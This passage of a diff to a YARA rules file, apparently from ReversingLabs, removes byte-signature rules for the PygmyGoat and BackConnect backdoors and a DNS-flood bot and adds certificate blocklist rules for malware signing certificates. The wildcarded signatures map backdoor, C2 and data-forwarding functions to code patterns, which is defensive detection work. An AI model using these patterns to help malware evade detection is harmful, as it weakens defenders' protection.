-            AB 48 8D 7C 24 ?? BE ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ??
-            48 8D 7D ?? 48 8D 74 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? 00
-            00 E8 ?? ?? ?? ?? 48 89 EE 48 89 DF C6 84 24 ?? ?? ?? ?? ?? C6 84 24
-        }
-		$dns_flood_64_p2 = {
-            66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00
-            ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? E8 ?? ?? ?? ?? 48 89 D9 8B 01 48 83 C1 ?? 8D 90
-            ?? ?? ?? ?? F7 D0 21 C2 81 E2 ?? ?? ?? ?? 74 ?? 89 D0 C1 E8 ?? F7 C2 ?? ?? ?? ?? 0F
-            44 D0 48 8D 41 ?? 48 0F 44 C8 00 D2 48 83 D9 ?? 48 29 D9 48 8D 84 0C ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? 66 C7 00 ?? ?? 66 C7 40 ?? ?? ?? 48 89 CB 8B 13 48 83 C3 ?? 8D
-            82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 48 8D 7C 24 ?? BE ?? ?? ?? ??
-            C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 53 ?? 48 0F 44 DA 00 C0 48 83 DB ?? 48 29 CB
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 EE 89 84 24 ?? ?? ?? ?? 0F
-            B7 44 24 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 7D ?? 48 8D 74 24 ?? E8 ??
-            ?? ?? ?? 41 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 B9 ?? ??
-            ?? ?? 83 C3 ?? C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ??
-            ?? ?? 31 D2 48 8D B4 24 ?? ?? ?? ?? 31 C9 F7 35 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89
-            E0 44 89 EF 89 D2 8B 04 95 ?? ?? ?? ?? 48 63 D3 89 44 24 ?? E8 ?? ?? ?? ?? 49 83 84
-            24 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? BF ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $collect_system_information_32_p* ) ) and ( $send_system_info_32 ) and ( $parse_c2_commands_32 ) and ( all of ( $dns_flood_32_p* ) ) ) or ( ( all of ( $collect_system_information_64_p* ) ) and ( $send_system_info_64 ) and ( $parse_c2_commands_64 ) and ( all of ( $dns_flood_64_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aarav Consulting Inc." and pe.signatures [ i ] . serial == "0f:1a:e2:23:9b:b9:6c:5a:ef:49:d0:ae:50:26:69:12" and 1653004800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Pygmygoat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects PygmyGoat backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c6ffe84d-c1ae-5856-bd49-4633b049f95c"
-		date = "2025-01-20"
-		modified = "2025-01-20"
+		id = "ef29c813-e914-5766-990f-76c14d18ec79"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.PygmyGoat.yara#L1-L135"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "11e076865bfc72b79ca42ca821e4c1d81ea705f3ba7711be8677b648ada859a1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10734-L10750"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "67c3d3496caf54ca0b1afc4d1dcc902e2f3632ac6708f85e163d427b567d098f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "PygmyGoat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$create_backdoor_socket = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 30 89 74 08 ?? 8D 50 ?? 83 E2 ?? 29 D0 01 C1 83
-            E1 ?? C1 E9 ?? 89 D7 89 F0 F3 AB 83 EC ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 83 7D ?? ?? 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ??
-            8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
-            C0 ?? 89 45 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? 83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
-            ?? ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            83 EC ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ??
-            ?? ?? C6 40 ?? ?? 83 EC ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            66 C7 85 ?? ?? ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 83 C0 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
-            C0 ?? 89 45 ?? 83 EC ?? 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 74 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ??
-            83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
-            ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 8D
-            65 ?? 5B 5E 5F 5D C3
-        }
-		$backdoor_dataforward_p1 = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? BE ?? ?? ?? ??
-            BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 D1 89 C2 89 D7 89 F0 FC F3 AB 89 FA 89 4D ?? 89
-            55 ?? 8B 45 ?? 39 45 ?? 0F 4D 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 0F 88 ?? ?? ?? ??
-            83 7D ?? ?? 0F 88 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ??
-            ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ?? ?? ?? 83 EC ?? 6A ?? 6A
-            ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
-            79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83
-            E0 ?? 8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ??
-            ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
-        }
-		$backdoor_dataforward_p2 = {
-            C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 E0 ??
-            8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
-            ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00
-            83 F8 ?? 75 ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? EB ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ??
-            ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? EB ?? E9
-            ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? B8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
-        }
-		$main_constructor = {
-            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 89 45 ?? 8D
-            83 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 EC ?? 6A ?? 8D 45 ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 50
-            8D 83 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 83 EC ?? FF 75
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B 45 ?? 83 F8 ?? 77 ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C2 89 D0 83 EC ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 83 EC ?? 68 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 89 83 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 8B 83 ?? ?? ?? ??
-            83 EC ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 79 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C2 8B 83 ?? ?? ?? ?? 83 EC ?? 52 8D 55 ?? 52 50 E8 ??
-            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 75 ?? 83 EC
-            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 EC ?? 8D 83 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
-            ?? 8B 83 ?? ?? ?? ?? 83 EC ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? C9 C3
-        }
-		$hook_accept_function_p1 = {
-            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
-            74 ?? 8B 45 ?? 8B 00 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC
-            ?? FF 75 ?? FF 75 ?? FF 75 ?? 8B 45 ?? FF D0 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9
-            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 94 C0
-            0F B6 C0 89 45 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 81 65 ?? ?? ?? ?? ?? 83 EC ?? 6A
-            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? EB ?? 6A ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
-            7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 83 EC ?? 50 8D 83 ?? ?? ?? ??
-            50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? EB
-            ?? 83 EC ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 83 7D ?? ?? 76
-        }
-		$hook_accept_function_p2 = {
-            83 7D ?? ?? 76 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ?? ??
-            ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ??
-            ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
-            45 ?? 3B 45 ?? 75 ?? EB ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 81
-            7D ?? ?? ?? ?? ?? 7E ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC
-            ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8
-            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 00 83 EC ?? 50 6A ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 89 10 83 EC ?? FF 75 ?? FF 75 ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 5D ?? C9 C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $create_backdoor_socket ) and ( all of ( $backdoor_dataforward_p* ) ) and ( $main_constructor ) and ( all of ( $hook_accept_function_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" and 1645401600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Backdoor_Backconnect : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BackConnect backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2c65c7ea-8546-5423-a1e7-dc7c12663099"
-		date = "2025-04-11"
-		modified = "2025-04-11"
+		id = "51c596cd-3033-51ef-914f-310d2bbfbd5f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win64.Backdoor.BackConnect.yara#L1-L154"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7089d5f2dab21755e83ca81ea6cf0f8a55fa261fa2c556759812b16a3d78608a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10752-L10768"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dec9d43c6911deb5f35c45692bfd6ef47f85d955f5e59041e58a1f0d2fc306e3"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "BackConnect"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$network_communication_p1 = {
-            48 89 5C 24 ?? 4C 89 44 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83
-            EC ?? 45 33 F6 4C 8B EA 45 8B FE 41 8B EE 41 8B FE 48 8B D9 48 8B 05 ?? ?? ?? ?? 44
-            3B B8 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 44 39 74 39 ?? 0F 84 ?? ??
-            ?? ?? 48 8B 4C 39 ?? 41 FF C7 48 83 F9 ?? 0F 84 ?? ?? ?? ?? 49 8B D0 FF 15 ?? ?? ??
-            ?? 85 C0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 74 ?? 44 89 74 24 ?? 48 8D 84 24
-            ?? ?? ?? ?? 44 89 B4 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 39 ?? BA ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 41 B0 ?? 48 8B
-            81 ?? ?? ?? ?? 44 88 74 07 ?? 8B C5 48 6B D0 ?? 48 03 91 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 48 8B 4C 39 ?? 49 8B D5 FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 85 C0
-            74 ?? 4C 8B 81 ?? ?? ?? ?? 42 80 7C 07 ?? ?? 75 ?? 8B C5 48 6B D0 ?? 49 03 D0 E8 ??
-            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 49 8B D5 48 8B 4C 39 ?? FF 15 ??
-            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B D3 44 8B E0 48 8B 89 ?? ?? ?? ?? 48 8B 4C 39 ??
-            FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 44 8B F0 48 8B 9E ?? ?? ?? ?? 48 03 DF 83 7B
-            ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 48 2B 43 ?? 48 83 F8
-            ?? 7E ?? 48 83 4B ?? ?? 45 33 F6 44 89 73 ?? 41 B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 85
-        }
-		$network_communication_p2 = {
-            F6 74 ?? 48 8B 15 ?? ?? ?? ?? 45 33 C9 48 8B 4B ?? 41 B8 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 45 33 F6 85 C0 74 ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 3D ??
-            ?? ?? ?? 75 ?? 41 8B C6 EB ?? 85 C0 78 ?? 01 43 ?? BA ?? ?? ?? ?? 4C 8B 0D ?? ?? ??
-            ?? 48 8B CE 44 8B 43 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? FF 15 ?? ?? ??
-            ?? 48 83 4B ?? ?? E9 ?? ?? ?? ?? 45 33 F6 45 85 E4 0F 84 ?? ?? ?? ?? 44 8B 43 ?? 45
-            85 C0 0F 84 ?? ?? ?? ?? 48 8B 53 ?? 45 33 C9 48 8B 4B ?? FF 15 ?? ?? ?? ?? 83 F8 ??
-            75 ?? FF 15 ?? ?? ?? ?? 48 8B 4B ?? FF 15 ?? ?? ?? ?? 48 83 4B ?? ?? 41 B8 ?? ?? ??
-            ?? 48 8B D3 44 89 73 ?? 48 8B CE E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? 29 43 ?? 44 8B 43
-            ?? 01 43 ?? 48 63 D0 48 03 D1 E8 ?? ?? ?? ?? 8A 4B ?? F6 C1 ?? 74 ?? 8B 43 ?? C1 E8
-            ?? 39 43 ?? 77 ?? 44 8B 43 ?? 80 E1 ?? 45 33 C9 88 4B ?? 48 8B CE 44 89 74 24 ?? 41
-            8D 51 ?? E8 ?? ?? ?? ?? F6 43 ?? ?? 74 ?? 44 39 73 ?? 75 ?? 45 33 C0 48 8B D3 48 8B
-            CE E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? FF C5 48 83 C7 ??
-            81 FD ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
-            41 5E 41 5D 41 5C 5F 5E 5D C3
-        }
-		$get_system_information = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8B EC 48
-            81 EC ?? ?? ?? ?? 48 8B F9 48 8D 4D ?? FF 15 ?? ?? ?? ?? 4C 8B 75 ?? 48 81 FF ?? ??
-            ?? ?? 76 ?? 48 8D 87 ?? ?? ?? ?? 4C 3B F0 4C 0F 42 F0 48 8B 1D ?? ?? ?? ?? 4C 8D A7
-            ?? ?? ?? ?? 4C 39 65 ?? 4C 0F 46 65 ?? 49 81 EC ?? ?? ?? ?? 33 F6 48 85 DB 74 ?? 49
-            3B DE 72 ?? 49 3B DC 73 ?? 48 39 73 ?? 0F 85 ?? ?? ?? ?? 48 8B 1B EB ?? 4C 8B FF 49
-            3B FE 72 ?? 44 8B 6D ?? 33 D2 49 8B C7 49 F7 F5 4C 2B FA 4D 2B FD 4D 3B FE 72 ?? 41
-            B8 ?? ?? ?? ?? 48 8D 55 ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 81 7D ?? ?? ??
-            ?? ?? 74 ?? 4C 8B 7D ?? 4D 3B FD 72 ?? EB ?? 4D 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ??
-            ?? ?? 4D 3B FE 73 ?? 48 85 DB 0F 85 ?? ?? ?? ?? 49 3B FC 0F 87 ?? ?? ?? ?? 44 8B 7D
-            ?? 33 D2 48 8B C7 45 8B F7 49 F7 F7 41 8B C7 48 2B C2 48 03 C7 48 8B F8 49 3B C4 0F
-            87 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 0F
-            84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 33 D2 41 8D 7F ?? 48 03 7D ?? 48 03 7D ??
-            48 8B C7 49 F7 F6 48 2B FA 49 3B FC EB ?? 48 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ?? ??
-            ?? ?? 41 B8 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 E9 ?? ?? ?? ??
-            48 8D 4B ?? 89 73 ?? BA ?? ?? ?? ?? 48 89 31 48 8B C1 48 89 4B ?? 48 83 C2 ?? 48 83
-            C1 ?? 48 8B F0 48 81 FA ?? ?? ?? ?? 76 ?? 48 8B 05 ?? ?? ?? ?? 48 89 03 48 89 1D ??
-            ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 48 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B
-            E3 41 5F 41 5E 41 5D 41 5C 5D C3
-        }
-		$get_dns_servers_p1 = {
-            4C 8B DC 49 89 5B ?? 55 56 57 41 56 41 57 48 83 EC ?? 83 64 24 ?? ?? 49 8D 43 ?? 33
-            D2 49 89 43 ?? 49 83 63 ?? ?? 45 33 C9 45 33 C0 8D 7A ?? 8B CF FF 15 ?? ?? ?? ?? 8B
-            44 24 ?? 8D 6F ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C8 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85
-            C0 0F 84 ?? ?? ?? ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C
-            24 ?? 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0B 8B D5 C1 E1 ?? 03 CD E8
-            ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33 FF 39 3B 76 ?? 8B 4C BB ?? FF 15 ?? ?? ?? ??
-            48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 8B 03 2B C5 3B F8 73 ?? 48 8D 15 ?? ?? ?? ?? 48
-            8B CE FF 15 ?? ?? ?? ?? 03 FD 3B 3B 72 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D6 48
